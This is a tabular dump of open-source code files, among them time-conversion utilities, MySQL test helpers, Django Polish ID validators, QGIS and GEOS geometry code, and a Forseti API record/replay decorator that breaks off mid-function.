repo_name | path | copies | size | content | license |
|---|---|---|---|---|---|
mireianievas/enrico | script/ConvertTime.py | 2 | 2030 | #!/usr/bin/env python
import time,sys
epoch_ref = 1331679600+3600
mjd_ref = 56000.
met_ref = 353376002.000
def MJDtoJD(MJD):
return MJD+2400000.5
def JDtoMJD(JD):
return JD-2400000.5
def EpochToMeT(epoch):
# Works only on Linux machines
depoch = epoch-epoch_ref
return depoch + met_ref+3600
def DateToMet(date):
# Works only on Linux machines
pattern = '%Y-%m-%d %H:%M:%S'
try :
epoch = int(time.mktime(time.strptime(date, pattern)))
except:
pattern = '%Y-%m-%d'
epoch = int(time.mktime(time.strptime(date, pattern)))
return EpochToMeT(epoch)
def MetToDate(met):
# Works only on Linux machines
epoch = met-met_ref+epoch_ref
pattern = '%Y-%m-%d %H:%M:%S'
return time.strftime(pattern,time.gmtime(epoch))
def MJDToMeT(MJD):
return (MJD-mjd_ref)*3600*24+met_ref
def MeTToMJD(met):
return (met-met_ref)/3600/24.+mjd_ref
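# Worked example with the constants above (a sketch, not part of the original
# script): MJDToMeT(56101) = (56101 - 56000.) * 86400 + 353376002.0
#                          = 362102402.0 seconds, and MeTToMJD(362102402.0)
# recovers 56101.0.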
def Print(date,mjd,met,jd):
print(("ISO date : ",date))
print(("MJD : ",mjd))
print(("JD : ",jd))
print(("MET : ",met))
def _log_():
print(("Usage: ",sys.argv[0]," Type Date"))
print("Type can be : MJD, JD, MET or ISO")
print("Data is the date to convert")
print(("exemple:\n\tpython ",sys.argv[0]," MJD 56101"))
print(("\tpython ",sys.argv[0]," ISO 2012-02-05"))
print(("\tpython ",sys.argv[0]," ISO 2012-02-05 16:15:18"))
if __name__=="__main__":
try :
Date_type = sys.argv[1]
except :
_log_()
exit()
if Date_type=="ISO":
try :
iso = sys.argv[2]+" "+sys.argv[3]
except :
iso = sys.argv[2]
Met = DateToMet(iso)
MJD = MeTToMJD(Met)
JD = MJDtoJD(MJD)
elif Date_type=="MJD":
MJD = float(sys.argv[2])
JD = MJDtoJD(MJD)
Met = MJDToMeT(MJD)
iso = MetToDate(Met)
elif Date_type=="MET":
Met = float(sys.argv[2])
MJD = MeTToMJD(Met)
JD = MJDtoJD(MJD)
iso = MetToDate(Met)
elif Date_type=="JD":
JD = float(sys.argv[2])
MJD = JDtoMJD(JD)
Met = MJDToMeT(MJD)
iso = MetToDate(Met)
else:
_log_()
exit()
Print(iso,MJD,Met,JD)
| bsd-3-clause |
metacloud/percona-xtrabackup | test/kewpie/lib/util/mysql_methods.py | 21 | 9772 | #! /usr/bin/env python
# -*- mode: python; indent-tabs-mode: nil; -*-
# vim:expandtab:shiftwidth=2:tabstop=2:smarttab:
#
# Copyright (C) 2011 Patrick Crews
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
""" mysql_methods
collection of helper methods (mysqldump, execute_query, etc)
that make working with a given server easier and repeatable
"""
import os
import difflib
import subprocess
import MySQLdb
def execute_cmd(cmd, stdout_path, exec_path=None, get_output=False):
stdout_file = open(stdout_path,'w')
cmd_subproc = subprocess.Popen( cmd
, shell=True
, cwd=exec_path
, stdout = stdout_file
, stderr = subprocess.STDOUT
)
cmd_subproc.wait()
retcode = cmd_subproc.returncode
stdout_file.close()
if get_output:
data_file = open(stdout_path,'r')
output = ''.join(data_file.readlines())
else:
output = None
return retcode, output
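# Example usage (a minimal sketch; the paths are hypothetical): run a shell
# command, send stdout and stderr to a file, and read the combined output back:
#     retcode, output = execute_cmd('ls -l', '/tmp/ls.out', get_output=True)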
def get_tables(server, schema):
""" Return a list of the tables in the
schema on the server
"""
results = []
query = "SHOW TABLES IN %s" %(schema)
retcode, table_set = execute_query(query, server)
for table_data in table_set:
table_name = table_data[0]
results.append(table_name)
return results
def check_slaves_by_query( master_server
, other_servers
, query
, expected_result = None
):
""" We execute the query across all servers
and return a dict listing any diffs found,
None if all is good.
If a user provides an expected_result, we
will skip executing against the master.
This is done as it is assumed the expected
result has been generated / tested against
the master.
"""
comp_results = {}
if expected_result:
pass # don't bother getting it
else:
# run against master for 'good' value
retcode, expected_result = execute_query(query, master_server)
for server in other_servers:
retcode, slave_result = execute_query(query, server)
#print "%s: expected_result= %s | slave_result= %s" % ( server.name
# , expected_result
# , slave_result_
# )
if not expected_result == slave_result:
comp_data = "%s: expected_result= %s | slave_result= %s" % ( server.name
, expected_result
, slave_result
)
if server.name in comp_results:
comp_results[server.name].append(comp_data)
else:
comp_results[server.name]=[comp_data]
if comp_results:
return comp_results
return None
def check_slaves_by_checksum( master_server
, other_servers
, schemas=['test']
, tables=[]
):
""" We compare the specified tables (default = all)
from the specified schemas between the 'master'
and the other servers provided (via list)
via CHECKSUM
We return a dictionary listing the server
and any tables that differed
"""
comp_results = {}
for server in other_servers:
for schema in schemas:
for table in get_tables(master_server, schema):
query = "CHECKSUM TABLE %s.%s" %(schema, table)
retcode, master_checksum = execute_query(query, master_server)
retcode, slave_checksum = execute_query(query, server)
#print "%s: master_checksum= %s | slave_checksum= %s" % ( table
# , master_checksum
# , slave_checksum
# )
if not master_checksum == slave_checksum:
comp_data = "%s: master_checksum= %s | slave_checksum= %s" % ( table
, master_checksum
, slave_checksum
)
if server.name in comp_results:
comp_results[server.name].append(comp_data)
else:
comp_results[server.name]=[comp_data]
if comp_results:
return comp_results
return None
def take_mysqldump( server
, databases=[]
, tables=[]
, dump_path = None
, cmd_root = None):
""" Take a mysqldump snapshot of the given
server, storing the output to dump_path
"""
if not dump_path:
dump_path = os.path.join(server.vardir, 'dumpfile.dat')
if cmd_root:
dump_cmd = cmd_root
else:
dump_cmd = "%s --no-defaults --user=root --port=%d --host=127.0.0.1 --protocol=tcp --result-file=%s" % ( server.mysqldump
, server.master_port
, dump_path
)
if databases:
if len(databases) > 1:
# We have a list of db's to dump, so we pass them via --databases
dump_cmd = ' '.join([dump_cmd, '--databases', ' '.join(databases)])
else:
dump_cmd = ' '.join([dump_cmd, databases[0], ' '.join(tables)])
execute_cmd(dump_cmd, os.devnull)
def diff_dumpfiles(orig_file_path, new_file_path):
""" diff two dumpfiles useful for comparing servers """
orig_file = open(orig_file_path,'r')
restored_file = open(new_file_path,'r')
orig_file_data = []
rest_file_data = []
orig_file_data= filter_data(orig_file.readlines(),'Dump completed')
rest_file_data= filter_data(restored_file.readlines(),'Dump completed')
server_diff = difflib.unified_diff( orig_file_data
, rest_file_data
, fromfile=orig_file_path
, tofile=new_file_path
)
diff_output = []
for line in server_diff:
diff_output.append(line)
output = '\n'.join(diff_output)
orig_file.close()
restored_file.close()
return (diff_output==[]), output
def filter_data(input_data, filter_text ):
return_data = []
for line in input_data:
if filter_text in line.strip():
pass
else:
return_data.append(line)
return return_data
def execute_query( query
, server
, server_host = '127.0.0.1'
, schema='test'):
try:
conn = MySQLdb.connect( host = server_host
, port = server.master_port
, user = 'root'
, db = schema)
cursor = conn.cursor()
cursor.execute(query)
result_set = cursor.fetchall()
cursor.close()
except MySQLdb.Error, e:
return 1, ("Error %d: %s" %(e.args[0], e.args[1]))
conn.commit()
conn.close()
return 0, result_set
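# Example usage (a minimal sketch; `server` is assumed to expose the
# .master_port attribute used above):
#     retcode, rows = execute_query("SELECT COUNT(*) FROM t1", server)
#     if retcode:
#         print rows  # on failure, rows holds the error string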
def execute_queries( query_list
, server
, server_host= '127.0.0.1'
, schema= 'test'):
""" Execute a set of queries as a single transaction """
results = {}
retcode = 0
try:
conn = MySQLdb.connect( host = server_host
, port = server.master_port
, user = 'root'
, db = schema)
cursor = conn.cursor()
for idx, query in enumerate(query_list):
try:
cursor.execute(query)
result_set = cursor.fetchall()
except MySQLdb.Error, e:
result_set = "Error %d: %s" %(e.args[0], e.args[1])
retcode = 1
finally:
results[query+str(idx)] = result_set
conn.commit()
cursor.close()
conn.close()
except Exception, e:
retcode = 1
results = (Exception, e)
finally:
return retcode, results
| gpl-2.0 |
ric03uec/boto | boto/dynamodb/exceptions.py | 185 | 1687 | """
Exceptions that are specific to the dynamodb module.
"""
from boto.exception import BotoServerError, BotoClientError
from boto.exception import DynamoDBResponseError
class DynamoDBExpiredTokenError(BotoServerError):
"""
Raised when a DynamoDB security token expires. This is generally boto's
(or the user's) notice to renew their DynamoDB security tokens.
"""
pass
class DynamoDBKeyNotFoundError(BotoClientError):
"""
Raised when attempting to retrieve or interact with an item whose key
can't be found.
"""
pass
class DynamoDBItemError(BotoClientError):
"""
Raised when invalid parameters are passed when creating a
new Item in DynamoDB.
"""
pass
class DynamoDBNumberError(BotoClientError):
"""
Raised in the event of incompatible numeric type casting.
"""
pass
class DynamoDBConditionalCheckFailedError(DynamoDBResponseError):
"""
Raised when a ConditionalCheckFailedException response is received.
This happens when a conditional check, expressed via the expected_value
parameter, fails.
"""
pass
class DynamoDBValidationError(DynamoDBResponseError):
"""
Raised when a ValidationException response is received. This happens
when one or more required parameter values are missing, or if the item
has exceeded the 64KB size limit.
"""
pass
class DynamoDBThroughputExceededError(DynamoDBResponseError):
"""
Raised when the provisioned throughput has been exceeded.
Normally, when provisioned throughput is exceeded the operation
is retried. If the retries are exhausted then this exception
will be raised.
"""
pass
| mit |
hcs/mailman | src/mailman/utilities/interact.py | 3 | 3047 | # Copyright (C) 2006-2012 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""Provide an interactive prompt, mimicking the Python interpreter."""
from __future__ import unicode_literals
__metaclass__ = type
__all__ = [
'interact',
]
import os
import sys
import code
DEFAULT_BANNER = ''
def interact(upframe=True, banner=DEFAULT_BANNER, overrides=None):
"""Start an interactive interpreter prompt.
:param upframe: Whether or not to populate the interpreter's globals with
the locals from the frame that called this function.
:type upframe: bool
:param banner: The banner to print before the interpreter starts.
:type banner: string
:param overrides: Additional interpreter globals to add.
:type overrides: dict
"""
# The interactive prompt's namespace.
namespace = dict()
# Populate the console's namespace with the locals of the frame that called
# function (i.e. one up from here).
if upframe:
frame = sys._getframe(1)
namespace.update(frame.f_globals)
namespace.update(frame.f_locals)
if overrides is not None:
namespace.update(overrides)
interp = code.InteractiveConsole(namespace)
# Try to import the readline module, but don't worry if it's unavailable.
try:
import readline
except ImportError:
pass
# Mimic the real interactive interpreter's loading of any $PYTHONSTARTUP
# file. Note that if the startup file is not prepared to be exec'd more
# than once, this could cause a problem.
startup = os.environ.get('PYTHONSTARTUP')
if startup:
try:
execfile(startup, namespace)
except:
pass
# We don't want the funky console object in parentheses in the banner.
if banner == DEFAULT_BANNER:
banner = '''\
Python %s on %s
Type "help", "copyright", "credits" or "license" for more information.''' % (
sys.version, sys.platform)
elif not banner:
banner = None
interp.interact(banner)
# When an exception occurs in the InteractiveConsole, the various
# sys.exc_* attributes get set so that error handling works the same way
# there as it does in the built-in interpreter. Be anal about clearing
# any exception information before we're done.
sys.exc_clear()
sys.last_type = sys.last_value = sys.last_traceback = None
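# Example usage (a minimal sketch; the function and names are illustrative
# assumptions): drop into a debugging prompt with extra names available:
#
#     def debug_shell(config):
#         interact(banner='Mailman debugging shell',
#                  overrides=dict(config=config))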
| gpl-3.0 |
vipins/ccccms | env/Lib/site-packages/django/contrib/localflavor/pl/forms.py | 86 | 7601 | """
Polish-specific form helpers
"""
from __future__ import absolute_import
import re
from django.contrib.localflavor.pl.pl_administrativeunits import ADMINISTRATIVE_UNIT_CHOICES
from django.contrib.localflavor.pl.pl_voivodeships import VOIVODESHIP_CHOICES
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Select, RegexField
from django.utils.translation import ugettext_lazy as _
class PLProvinceSelect(Select):
"""
A select widget with list of Polish administrative provinces as choices.
"""
def __init__(self, attrs=None):
super(PLProvinceSelect, self).__init__(attrs, choices=VOIVODESHIP_CHOICES)
class PLCountySelect(Select):
"""
A select widget with list of Polish administrative units as choices.
"""
def __init__(self, attrs=None):
super(PLCountySelect, self).__init__(attrs, choices=ADMINISTRATIVE_UNIT_CHOICES)
class PLPESELField(RegexField):
"""
A form field that validates as Polish Identification Number (PESEL).
Checks the following rules:
* the length consist of 11 digits
* has a valid checksum
The algorithm is documented at http://en.wikipedia.org/wiki/PESEL.
"""
default_error_messages = {
'invalid': _(u'National Identification Number consists of 11 digits.'),
'checksum': _(u'Wrong checksum for the National Identification Number.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLPESELField, self).__init__(r'^\d{11}$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
super(PLPESELField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
multiple_table = (1, 3, 7, 9, 1, 3, 7, 9, 1, 3, 1)
result = 0
for i in range(len(number)):
result += int(number[i]) * multiple_table[i]
return result % 10 == 0
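# Worked example for the checksum above, using the sample PESEL from the
# Wikipedia article cited in the docstring (44051401359):
#   4*1 + 4*3 + 0*7 + 5*9 + 1*1 + 4*3 + 0*7 + 1*9 + 3*1 + 5*3 + 9*1 = 110
#   110 % 10 == 0, so the number passes validation.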
class PLNationalIDCardNumberField(RegexField):
"""
A form field that validates as Polish National ID Card Number.
Checks the following rules:
* the length consist of 3 letter and 6 digits
* has a valid checksum
The algorithm is documented at http://en.wikipedia.org/wiki/Polish_identity_card.
"""
default_error_messages = {
'invalid': _(u'National ID Card Number consists of 3 letters and 6 digits.'),
'checksum': _(u'Wrong checksum for the National ID Card Number.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLNationalIDCardNumberField, self).__init__(r'^[A-Za-z]{3}\d{6}$',
max_length, min_length, *args, **kwargs)
def clean(self,value):
super(PLNationalIDCardNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value = value.upper()
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
letter_dict = {'A': 10, 'B': 11, 'C': 12, 'D': 13,
'E': 14, 'F': 15, 'G': 16, 'H': 17,
'I': 18, 'J': 19, 'K': 20, 'L': 21,
'M': 22, 'N': 23, 'O': 24, 'P': 25,
'Q': 26, 'R': 27, 'S': 28, 'T': 29,
'U': 30, 'V': 31, 'W': 32, 'X': 33,
'Y': 34, 'Z': 35}
# convert letters to integer values
int_table = [letter_dict[c] if not c.isdigit() else int(c)
for c in number]
multiple_table = (7, 3, 1, -1, 7, 3, 1, 7, 3)
result = 0
for i in range(len(int_table)):
result += int_table[i] * multiple_table[i]
return result % 10 == 0
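# Worked example for the checksum above (a synthetic number constructed only
# to satisfy this check): for 'ABC123458', the letters map to 10, 11, 12, so
#   10*7 + 11*3 + 12*1 + 1*(-1) + 2*7 + 3*3 + 4*1 + 5*7 + 8*3 = 200
#   200 % 10 == 0, so the number passes validation.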
class PLNIPField(RegexField):
"""
A form field that validates as Polish Tax Number (NIP).
Valid forms are: XXX-YYY-YY-YY, XXX-YY-YY-YYY or XXXYYYYYYY.
Checksum algorithm based on documentation at
http://wipos.p.lodz.pl/zylla/ut/nip-rego.html
"""
default_error_messages = {
'invalid': _(u'Enter a tax number field (NIP) in the format XXX-XXX-XX-XX, XXX-XX-XX-XXX or XXXXXXXXXX.'),
'checksum': _(u'Wrong checksum for the Tax Number (NIP).'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLNIPField, self).__init__(r'^\d{3}-\d{3}-\d{2}-\d{2}$|^\d{3}-\d{2}-\d{2}-\d{3}$|^\d{10}$',
max_length, min_length, *args, **kwargs)
def clean(self,value):
super(PLNIPField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value = re.sub("[-]", "", value)
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
multiple_table = (6, 5, 7, 2, 3, 4, 5, 6, 7)
result = 0
for i in range(len(number)-1):
result += int(number[i]) * multiple_table[i]
result %= 11
return result == int(number[-1])
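# Worked example for the checksum above (a synthetic NIP constructed only to
# satisfy this check): for '1234563218',
#   1*6 + 2*5 + 3*7 + 4*2 + 5*3 + 6*4 + 3*5 + 2*6 + 1*7 = 118
#   118 % 11 == 8, which matches the final digit, so the number passes.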
class PLREGONField(RegexField):
"""
A form field that validates its input is a REGON number.
Valid regon number consists of 9 or 14 digits.
See http://www.stat.gov.pl/bip/regon_ENG_HTML.htm for more information.
"""
default_error_messages = {
'invalid': _(u'National Business Register Number (REGON) consists of 9 or 14 digits.'),
'checksum': _(u'Wrong checksum for the National Business Register Number (REGON).'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLREGONField, self).__init__(r'^\d{9,14}$',
max_length, min_length, *args, **kwargs)
def clean(self,value):
super(PLREGONField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
weights = (
(8, 9, 2, 3, 4, 5, 6, 7, -1),
(2, 4, 8, 5, 0, 9, 7, 3, 6, 1, 2, 4, 8, -1),
(8, 9, 2, 3, 4, 5, 6, 7, -1, 0, 0, 0, 0, 0),
)
weights = [table for table in weights if len(table) == len(number)]
for table in weights:
checksum = sum([int(n) * w for n, w in zip(number, table)])
if checksum % 11 % 10:
return False
return bool(weights)
class PLPostalCodeField(RegexField):
"""
A form field that validates as Polish postal code.
Valid code is XX-XXX where X is digit.
"""
default_error_messages = {
'invalid': _(u'Enter a postal code in the format XX-XXX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLPostalCodeField, self).__init__(r'^\d{2}-\d{3}$',
max_length, min_length, *args, **kwargs)
| bsd-3-clause |
supergis/QGIS | python/plugins/processing/algs/qgis/MeanCoords.py | 10 | 4806 | # -*- coding: utf-8 -*-
"""
***************************************************************************
MeanCoords.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QGis, QgsField, QgsFeature, QgsGeometry, QgsPoint
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterTableField
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class MeanCoords(GeoAlgorithm):
POINTS = 'POINTS'
WEIGHT = 'WEIGHT'
OUTPUT = 'OUTPUT'
UID = 'UID'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Mean coordinate(s)')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POINTS,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterTableField(self.WEIGHT,
self.tr('Weight field'), MeanCoords.POINTS,
ParameterTableField.DATA_TYPE_NUMBER, optional=True))
self.addParameter(ParameterTableField(self.UID,
self.tr('Unique ID field'), MeanCoords.POINTS,
ParameterTableField.DATA_TYPE_NUMBER, optional=True))
self.addOutput(OutputVector(MeanCoords.OUTPUT, self.tr('Mean coordinates')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
weightField = self.getParameterValue(self.WEIGHT)
uniqueField = self.getParameterValue(self.UID)
if weightField is None:
weightIndex = -1
else:
weightIndex = layer.fieldNameIndex(weightField)
if uniqueField is None:
uniqueIndex = -1
else:
uniqueIndex = layer.fieldNameIndex(uniqueField)
fieldList = [QgsField('MEAN_X', QVariant.Double, '', 24, 15),
QgsField('MEAN_Y', QVariant.Double, '', 24, 15),
QgsField('UID', QVariant.String, '', 255)]
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(
fieldList, QGis.WKBPoint, layer.crs()
)
current = 0
features = vector.features(layer)
total = 100.0 / float(len(features))
means = {}
for feat in features:
current += 1
progress.setPercentage(current * total)
if uniqueIndex == -1:
clazz = "Single class"
else:
clazz = unicode(feat.attributes()[uniqueIndex]).strip()
if weightIndex == -1:
weight = 1.00
else:
try:
weight = float(feat.attributes()[weightIndex])
except (ValueError, TypeError):
weight = 1.00
if clazz not in means:
means[clazz] = (0, 0, 0)
(cx, cy, totalweight) = means[clazz]
geom = QgsGeometry(feat.geometry())
geom = vector.extractPoints(geom)
for i in geom:
cx += i.x() * weight
cy += i.y() * weight
totalweight += weight
means[clazz] = (cx, cy, totalweight)
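# Each class now holds running sums, so the weighted mean coordinate is
#   mean_x = sum(x_i * w_i) / sum(w_i)   (and likewise for mean_y),
# which is what the per-class division below computes.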
for (clazz, values) in means.iteritems():
outFeat = QgsFeature()
cx = values[0] / values[2]
cy = values[1] / values[2]
meanPoint = QgsPoint(cx, cy)
outFeat.setGeometry(QgsGeometry.fromPoint(meanPoint))
outFeat.setAttributes([cx, cy, clazz])
writer.addFeature(outFeat)
del writer
| gpl-2.0 |
jhroot/elife-bot | tests/activity/test_activity_verify_image_server.py | 2 | 3442 | import unittest
import settings_mock
from activity.activity_VerifyImageServer import activity_VerifyImageServer
import test_activity_data as test_data
from mock import patch, MagicMock
from classes_mock import FakeSession
from ddt import ddt, data
class FakeStorageContext:
def list_resources(self, resource):
return ['elife-003530-fig1-v1-1022w.jpg',
'elife-003530-fig1-v1-80w.jpg',
'elife-003530-fig1-v1-1022w.gif',
'elife-003530-fig1-v1.jpg',
'elife-003530-fig1-v1.tif',
'elife-003530-fig1-v1-download.jpg',
'elife-003530-fig1-v1-download.xml']
class TestVerifyImageServer(unittest.TestCase):
def setUp(self):
self.verifyimageserver = activity_VerifyImageServer(settings_mock, None, None, None, None)
@patch('activity.activity_VerifyImageServer.StorageContext')
@patch('activity.activity_VerifyImageServer.Session')
@patch.object(activity_VerifyImageServer,'retrieve_endpoints_check')
def test_do_activity_success(self, fake_retrieve_endpoints_check, fake_session, fake_storage_context):
# Given
data = test_data.data_example_before_publish
fake_retrieve_endpoints_check.return_value = [(True, "test.path")]
fake_session.return_value = FakeSession(test_data.session_example)
fake_storage_context.return_value = FakeStorageContext()
self.verifyimageserver.emit_monitor_event = MagicMock()
self.verifyimageserver.logger = MagicMock()
# When
result = self.verifyimageserver.do_activity(data)
# Then
self.assertEqual(result, self.verifyimageserver.ACTIVITY_SUCCESS)
@patch('activity.activity_VerifyImageServer.StorageContext')
@patch('activity.activity_VerifyImageServer.Session')
@patch.object(activity_VerifyImageServer,'retrieve_endpoints_check')
def test_do_activity_failure(self, fake_retrieve_endpoints_check, fake_session, fake_storage_context):
# Given
data = test_data.data_example_before_publish
fake_retrieve_endpoints_check.return_value = [(False, "test.path")]
fake_session.return_value = FakeSession(test_data.session_example)
fake_storage_context.return_value = FakeStorageContext()
self.verifyimageserver.emit_monitor_event = MagicMock()
self.verifyimageserver.logger = MagicMock()
# When
result = self.verifyimageserver.do_activity(data)
# Then
self.assertEqual(result, self.verifyimageserver.ACTIVITY_PERMANENT_FAILURE)
@patch('activity.activity_VerifyImageServer.StorageContext')
@patch('activity.activity_VerifyImageServer.Session')
@patch.object(activity_VerifyImageServer,'retrieve_endpoints_check')
def test_do_activity_error(self, fake_retrieve_endpoints_check, fake_session, fake_storage_context):
# Given
data = test_data.data_example_before_publish
fake_retrieve_endpoints_check.side_effect = Exception("Error!")
fake_session.return_value = FakeSession(test_data.session_example)
fake_storage_context.return_value = FakeStorageContext()
self.verifyimageserver.emit_monitor_event = MagicMock()
self.verifyimageserver.logger = MagicMock()
# When
result = self.verifyimageserver.do_activity(data)
# Then
self.assertEqual(result, self.verifyimageserver.ACTIVITY_PERMANENT_FAILURE)
| mit |
Avinash-Raj/appengine-django-skeleton | lib/django/contrib/gis/geos/prototypes/topology.py | 338 | 2145 | """
This module houses the GEOS ctypes prototype functions for the
topological operations on geometries.
"""
from ctypes import c_double, c_int
from django.contrib.gis.geos.libgeos import GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom, check_minus_one, check_string,
)
from django.contrib.gis.geos.prototypes.geom import geos_char_p
class Topology(GEOSFuncFactory):
"For GEOS unary topology functions."
argtypes = [GEOM_PTR]
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
# Topology Routines
geos_boundary = Topology('GEOSBoundary')
geos_buffer = Topology('GEOSBuffer', argtypes=[GEOM_PTR, c_double, c_int])
geos_centroid = Topology('GEOSGetCentroid')
geos_convexhull = Topology('GEOSConvexHull')
geos_difference = Topology('GEOSDifference', argtypes=[GEOM_PTR, GEOM_PTR])
geos_envelope = Topology('GEOSEnvelope')
geos_intersection = Topology('GEOSIntersection', argtypes=[GEOM_PTR, GEOM_PTR])
geos_linemerge = Topology('GEOSLineMerge')
geos_pointonsurface = Topology('GEOSPointOnSurface')
geos_preservesimplify = Topology('GEOSTopologyPreserveSimplify', argtypes=[GEOM_PTR, c_double])
geos_simplify = Topology('GEOSSimplify', argtypes=[GEOM_PTR, c_double])
geos_symdifference = Topology('GEOSSymDifference', argtypes=[GEOM_PTR, GEOM_PTR])
geos_union = Topology('GEOSUnion', argtypes=[GEOM_PTR, GEOM_PTR])
geos_cascaded_union = GEOSFuncFactory('GEOSUnionCascaded', argtypes=[GEOM_PTR], restype=GEOM_PTR)
# GEOSRelate returns a string, not a geometry.
geos_relate = GEOSFuncFactory(
'GEOSRelate', argtypes=[GEOM_PTR, GEOM_PTR], restype=geos_char_p, errcheck=check_string
)
# Linear referencing routines
geos_project = GEOSFuncFactory(
'GEOSProject', argtypes=[GEOM_PTR, GEOM_PTR], restype=c_double, errcheck=check_minus_one
)
geos_interpolate = Topology('GEOSInterpolate', argtypes=[GEOM_PTR, c_double])
geos_project_normalized = GEOSFuncFactory(
'GEOSProjectNormalized', argtypes=[GEOM_PTR, GEOM_PTR], restype=c_double, errcheck=check_minus_one
)
geos_interpolate_normalized = Topology('GEOSInterpolateNormalized', argtypes=[GEOM_PTR, c_double])
| bsd-3-clause |
forseti-security/forseti-security | google/cloud/forseti/common/util/replay.py | 1 | 6796 | # Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper functions used to record and replay API responses."""
from builtins import str
import collections
import functools
import os
import pickle
from googleapiclient import errors
from google.cloud.forseti.common.util import logger
LOGGER = logger.get_logger(__name__)
RECORD_ENVIRONMENT_VAR = 'FORSETI_RECORD_FILE'
REPLAY_ENVIRONMENT_VAR = 'FORSETI_REPLAY_FILE'
def _key_from_request(request):
"""Generate a unique key from a request.
Args:
request (HttpRequest): a googleapiclient HttpRequest object.
Returns:
str: A unique key from the request uri and body.
"""
return '{}{}'.format(request.uri, request.body)
def record(requests):
"""Record and serialize GCP API call answers.
Args:
requests (dict): A dictionary to store a copy of all requests and
responses in, before pickling.
Returns:
function: Decorator function.
"""
def decorate(f):
"""Decorator function for the wrapper.
Args:
f(function): passes a function into the wrapper.
Returns:
function: Wrapped function.
"""
@functools.wraps(f)
def record_wrapper(self, request, *args, **kwargs):
"""Record and serialize GCP API call answers.
Args:
self (object): Self of the caller.
request (HttpRequest): The HttpRequest object to execute.
**args (list): Additional args to pass through to function.
**kwargs (dict): Additional key word args to pass through to
function.
Returns:
object: The result from the wrapped function.
Raises:
HttpError: Raised by any fatal HTTP error when executing the
HttpRequest.
Exception: Any exception raised by the wrapped function.
"""
record_file = os.environ.get(RECORD_ENVIRONMENT_VAR, None)
if not record_file:
return f(self, request, *args, **kwargs)
with open(record_file, 'wb') as outfile:
pickler = pickle.Pickler(outfile)
request_key = _key_from_request(request)
results = requests.setdefault(
request_key, collections.deque())
try:
result = f(self, request, *args, **kwargs)
obj = {
'exception_args': None,
'raised': False,
'request': request.to_json(),
'result': result,
'uri': request.uri}
results.append(obj)
return result
except errors.HttpError as e:
# HttpError won't unpickle without all three arguments.
obj = {
'raised': True,
'request': request.to_json(),
'result': e.__class__,
'uri': request.uri,
'exception_args': (e.resp, e.content, e.uri)
}
results.append(obj)
raise
except Exception as e:
LOGGER.exception(e)
obj = {
'raised': True,
'request': request.to_json(),
'result': e.__class__,
'uri': request.uri,
'exception_args': [str(e)]
}
results.append(obj)
raise
finally:
